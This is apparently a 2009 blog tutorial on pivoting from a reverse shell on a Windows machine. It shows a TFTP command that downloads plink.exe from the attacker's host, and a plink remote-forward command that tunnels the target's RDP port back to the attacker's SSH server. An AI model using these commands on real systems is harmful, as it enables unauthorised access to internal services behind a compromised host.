2009
07.11

Simple SSH tunnel

An SSH tunnel encrypts traffic and access non-routable machines in a secure way.
Here’s a nice wiki explaining the subject in more depth -here-

So let’s imagine you’ve managed to receive a reserve shell from your target Windows machine. Once at the command prompt, you noticed other local ports open that were not available to you during your initial attack (How you got your reserve shell is not important).
Looking over the ports, you see port 3389 open on the system (of course other ports may be more interesting but that would be better explained with Metasploit). The exercise here is, how to gain access to this non routed port to your machine that is outside the network. The answer is a tunnel, and in our case an SSH tunnel.

First you’ll need an SSH server on your system (the attacker), an SSH client on your target. This example assumes that outgoing traffic isn’t limited or monitored. Remember this is just a simple exercise that can be easily accomplished at home on your local network.

Let’s start by getting a simple ssh client to our windows machines. There are many ways one can do this, I prefer using TFTP for 2 reasons. Firstly Windows usually comes with a TFTP client and Backtrack has a nifty TFTP server readily available. (note: one must always verify and see upload/download options)

So let’s start by uploading our ssh client “plink.exe
C:\>TFTP -i -your IP here- GET plink.exe
There’s no progress bar, so you’ll just have to wait for your prompt to come back once the upload is finished.

Now that you have your client, lets start our ssh connection. Make sure you have your listener setup.

C:\>plink -P 22 -l root -pw root -C -R 3389:127.0.0.1:3389 -your IP here-

Real quick, the -C puts compression on the connection and the -R remotely fowards it to the local machine. The user and password should be set to your own on the ssh server.

If all went well you’ll be back to your Linux prompt. Check to see what ports are now listening on your local machine, and you should see 3389 now.


Start up rdesktop and point it to 127.0.0.1 on port 3389 and you’ll be rewarded with a nice remote desktop.One could use this method on other ports for other means.
As mentioned above, you can remotely forward other ports and run other applications. Imagine forwarding port 139 to your local machine.

Please remember to do this on your local network, as this implies that you port scanned your victim machine. Port scanning is considered illegal in certain parts of the world.